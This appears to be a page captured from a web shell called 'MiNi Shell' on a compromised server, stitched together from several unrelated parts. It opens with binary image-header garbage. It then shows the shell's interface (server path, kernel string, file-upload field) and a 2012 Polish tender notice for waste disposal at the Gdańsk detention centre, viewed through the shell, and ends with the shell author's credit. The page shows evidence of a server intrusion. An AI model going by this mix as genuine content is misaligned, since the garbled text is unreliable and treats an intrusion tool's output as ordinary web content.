JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120625/137471-N-2012.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 2/Kw/2012 na wywóz i utylizację odpadów stałych i niebezpiecznych</b><br>
<b>Numer ogłoszenia: 137471 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 2/Kw/2012 na wywóz i utylizację odpadów stałych i niebezpiecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na usuwaniu i utylizacji odpadów stałych i niebezpiecznych z terenu Aresztu Śledczego w Gdańsku od daty podpisania umowy przez okres 12 miesięcy w n/w ilościach szacunkowych:

      I część:

Usługi związane z odbiorem i  wywozem odpadów komunalnych niesegregowanych (zmieszanych), odpadów z budów i remontów  oraz nieodpłatnym odbiorem segregowanych i gromadzonych selektywnie odpadów surowcowych.

Lp.
Przedmiot  zamówienia
Kod odpadu
Ilość w  ciągu 12 miesięcy 
1
Niesegregowane odpady komunalne  w kontenerach 7m3     
20 03 01
160 Mg
2
Niesegregowane odpady komunalne  w pojemniku 660 l.
20 03 01
3 Mg (24 pojemniki)
3
Odpady komunalne wielkogabarytowe w kontenerach 8m3
20 03 07
5 Mg (4 kontenery 8m3)
4
 Segregowane i gromadzone selektywnie odpady surowcowe  -papier i tektura
20 01 01
10 Mg
5
Segregowane i gromadzone selektywnie odpady surowcowe - tworzywa sztuczne     
20 01 39
1 Mg
6
Segregowane i gromadzone selektywnie odpady surowcowe - szkło
20 01 02
3 Mg
7
Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia inne niż wymienione w 170106   
17 01 07
100 Mg (25 kontenery 4m3)
Zbieranie odpadów odbywać się będzie w następujący sposób:
zmieszane odpady komunalne (kod 200301) w ilości ok. 160 ton gromadzone będą w 3 kontenerach krytych klapami o pojemności 7 m3 oraz w jednym pojemniku o pojemności 660 l, segregowane i gromadzone selektywnie odpady surowcowe - tworzywa sztuczne w ilości ok. 1 ton gromadzone będą w 2 pojemnikach  o pojemności 1 m3, segregowane i gromadzone selektywnie surowcowe -szkło ( kod 20 01 02)  w ilości ok.3 ton, gromadzone będą w  pojemniku  o pojemności 1 m3, segregowane i gromadzone selektywnie odpady -papier i tektura ( kod 20 01 01) w ilości ok. 10 Mg  gromadzone w pomieszczeniu Zamawiającego ładowane będą przez Zamawiającego do zamówienia odkrytego  kontenera o poj. 8M3, zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia (kod 170107) w ilości ok. 100 ton gromadzone będą w odkrytych kontenerach, dostarczonych przez  wykonawcę, o pojemności 4 m3,
 
Wykonawca zadania nr 1 zobowiąże się na cały okres świadczenia usługi wypożyczyć nieodpłatnie w ramach świadczonej usługi:
3 szt. kontenerów krytych z klapami o pojemności 7 m3, w których gromadzone będą zmieszane  odpady komunalne (kod 200301). Ze względu na charakter i specyfikę miejsca w którym będą one usytuowane (więzienie) kontenery  muszą  być zamykane w sposób   uniemożliwiający   swobodny dostęp do  ich wnętrza,
1 pojemnik 660 l w którym gromadzone będą zmieszane  odpady komunalne (kod 200301),
3 oznakowane pojemniki o pojemności ok. 1m3, do selektywnej zbiórki odpadów :
1 szt. na szkło (kod 20 01 02), 2 szt. na  tworzywa sztuczne( kod 20 01 39),

Wykonawca zadania nr 1 zobowiąże się na każde żądanie zamawiającego dostarczyć nieodpłatnie w ramach świadczonej usługi odkryte kontenery  o pojemności 8 m3 na odpady komunalne wielkogabarytowe i makulaturę oraz kontener na gruz o pojemności 4 m3. Kontenery o pojemności 7 m3, w których gromadzone będą odpady komunalne, opróżniane będą nie rzadziej niż raz w tygodniu każdy, natomiast pojemnik o pojemności 660 l  2 razy w miesiącu. Kontenery gruzowe i na odpady wielkogabarytowe podstawiane i opróżniane będą w miarę bieżących potrzeb zamawiającego. Pojemniki do selektywnej zbiórki opróżniane będą w miarę bieżących potrzeb zamawiającego po uprzednim zgłoszeniu telefonicznym. Makulatura odbierana będzie raz w tygodniu.

           Część 2

Usługi związane z odbiorem i transportem odpadów medycznych do uprawnionego odbiorcy.

l.p.
Przedmiot zamówienia
Kod odpadu
Ilosć w ciągu 12 miesięcy
1
Odpady medyczne 
18 01 03
2 Mg

Odpady medyczne (kod 180103) gromadzone będą w workach plastikowych koloru czerwonego o pojemności 120 l. Odbiór z terenu Aresztu śledczego nie rzadziej niż co 10 dni.

Zamawiający nie przewiduje składania ofert wariantowych, nie zamierza zawierać umowy ramowej, nie zamierza ustanawiać dynamicznego systemu zakupów, nie przewiduje wyboru najkorzystniejszej oferty stosując aukcję elektroniczną.

Zamawiający dopuszcza składanie ofert częściowych. Składanie ofert częściowych możliwe jest tylko w określonych dwóch częściach, każda część stanowi osobne zadanie.

Dostawy  realizowane będą od daty podpisania umowy przez okres 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/Kw/2012. Oryginały lub kserokopie poświadczone za zgodność z oryginałami przez wykonawcę zezwoleń, o których mowa w art. 26 i 28 ustawy z dnia 27.04.2001r. o odpadach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/Kw/2012</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/Kw/2012</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/Kw/2012</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/Kw/2012</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginały lub kserokopie poświadczone za zgodność z oryginałami przez wykonawcę zezwoleń, o których mowa w art. 26 i 28 ustawy z dnia 27.04.2001r. o odpadach.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności. Przy czym Zamawiający nie dopuszcza wzrostu cen za realizację przedmiotu umowy w roku 2012, w późniejszym okresie możliwe będą uzasadnione korekty cen nie większe niż wskaźnik wzrostu cen opublikowany przez GUS oraz spowodowane wzrostem opłaty środowiskowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, mail: as_gdansk@sw.gov.pl, fax: (058)-302-51-25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 13:30, miejsce: Sekretariat AŚ Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór i wywóz odpadów komunalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi polegające na wywozie i utylizacji odpadów stałych i niebezpiecznych z terenu Aresztu Śledczego w Gdańsku od daty podpisania umowy przez okres 12 miesięcy.
2.  Wykonawca zobowiązany jest do wykonywania usług zgodnie z przepisami ustawy o odpadach z dnia 27.04.2001 r. (tekst jednolity Dz. U. z 2010 r. nr 185 poz. 1243 z zm.) oraz przepisami wydanymi na jej podstawie i innymi przepisami obowiązującymi w zakresie usług będących przedmiotem zamówienia.
3. Świadczenie usług objętych przedmiotem zamówienia odbywać się będzie środkami transportu dostosowanymi do tego typu zadań i z zachowaniem stosownych norm ochrony środowiska.
4. Wykonawca przejmuje pełna odpowiedzialność za odpady wywiezione poza teren Zamawiającego. 


Zadanie 1

Usługi związane z odbiorem i  wywozem odpadów komunalnych niesegregowanych (zmieszanych), odpadów z budów i remontów  oraz nieodpłatnym odbiorem segregowanych i gromadzonych selektywnie odpadów surowcowych.

      1. Przewidywana przez zamawiającego ilość odpadów w okresie 12 miesięcy wynosi:

Lp.
Przedmiot  zamówienia
Kod odpadu
Ilość w  ciągu 12 miesięcy 
1
Niesegregowane odpady komunalne  w kontenerach 7m3     
20 03 01
160 Mg
2
Niesegregowane odpady komunalne  w pojemniku 660 l.
20 03 01
3 Mg (24 pojemniki)
3
Odpady komunalne wielkogabarytowe w kontenerach 8m3
20 03 07
5 Mg (4 kontenery 8m3)
4
 Segregowane i gromadzone selektywnie odpady surowcowe  -papier i tektura
20 01 01
10 Mg
5
Segregowane i gromadzone selektywnie odpady surowcowe - tworzywa sztuczne     
20 01 39
1 Mg
6
Segregowane i gromadzone selektywnie odpady surowcowe - szkło
20 01 02
3 Mg
7
Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia inne niż wymienione w 170106   
17 01 07
100 Mg (25 kontenery 4m3)

Zbieranie odpadów odbywać się będzie w następujący sposób:
4. zmieszane odpady komunalne (kod 200301) w ilości ok. 160 ton gromadzone będą w 3 kontenerach krytych klapami o pojemności 7 m3 oraz w jednym pojemniku o pojemności 660 l,
5.  Segregowane i gromadzone selektywnie odpady surowcowe - tworzywa sztuczne w ilości ok. 1 ton gromadzone będą w 2 pojemnikach  o pojemności 1 m3,
6. Segregowane i gromadzone selektywnie surowcowe -szkło ( kod 20 01 02)  w ilości ok.3 ton, gromadzone będą w  pojemniku  o pojemności 1 m3,
7. Segregowane i gromadzone selektywnie odpady -papier i tektura ( kod 20 01 01) w ilości ok. 10 Mg  gromadzone w pomieszczeniu Zamawiającego ładowane będą przez Zamawiającego do zamówienia odkrytego  kontenera o poj. 8m3 
Zmieszane odpady z betonu, gruzu ceglanego, odpadowych materiałów ceramicznych i elementów wyposażenia (kod 170107) w ilości ok. 100 ton gromadzone będą w odkrytych kontenerach, dostarczonych przez  wykonawcę, o pojemności 4 m3,
 
Wykonawca zadania nr 1 zobowiąże się na cały okres świadczenia usługi wypożyczyć nieodpłatnie w ramach świadczonej usługi:
3 szt. kontenerów krytych z klapami o pojemności 7 m3, w których gromadzone będą zmieszane  odpady komunalne (kod 200301). Ze względu na charakter i specyfikę miejsca w którym będą one usytuowane (więzienie) kontenery  muszą  być zamykane w sposób   uniemożliwiający   swobodny dostęp do  ich wnętrza,
1 pojemnik 660 l w którym gromadzone będą zmieszane  odpady komunalne (kod 200301),
3 oznakowane pojemniki o pojemności ok. 1m3, do selektywnej zbiórki odpadów :
1 szt. na szkło (kod 20 01 02), 2 szt. na  tworzywa sztuczne( kod 20 01 39),

Wykonawca zadania nr 1 zobowiąże się na każde żądanie zamawiającego dostarczyć nieodpłatnie w ramach świadczonej usługi odkryte kontenery  o pojemności 8 m3 na odpady komunalne wielkogabarytowe i makulaturę oraz kontener na gruz o pojemności 4 m3.
Kontenery o pojemności 7 m3, w których gromadzone będą odpady komunalne, opróżniane będą nie rzadziej niż raz w tygodniu każdy, natomiast pojemnik o pojemności 660 l  2 razy w miesiącu. Kontenery gruzowe i na odpady wielkogabarytowe podstawiane i opróżniane będą w miarę bieżących potrzeb zamawiającego. Pojemniki do selektywnej zbiórki opróżniane będą w miarę bieżących potrzeb zamawiającego po uprzednim zgłoszeniu telefonicznym. Makulatura odbierana będzie raz w tygodniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Odbiór i transport odpadów medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III. Zadanie 2

Usługi związane z odbiorem i transportem odpadów medycznych do uprawnionego odbiorcy.

l.p.
Przedmiot zamówienia
Kod odpadu
Ilosć w ciągu 12 miesięcy
1
Odpady medyczne
18 01 03
2 Mg

1. Odpady medyczne (kod 180103) gromadzone będą w workach plastikowych koloru czerwonego o pojemności 120 l. Odbiór z terenu Aresztu śledczego nie rzadziej niż co 10 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com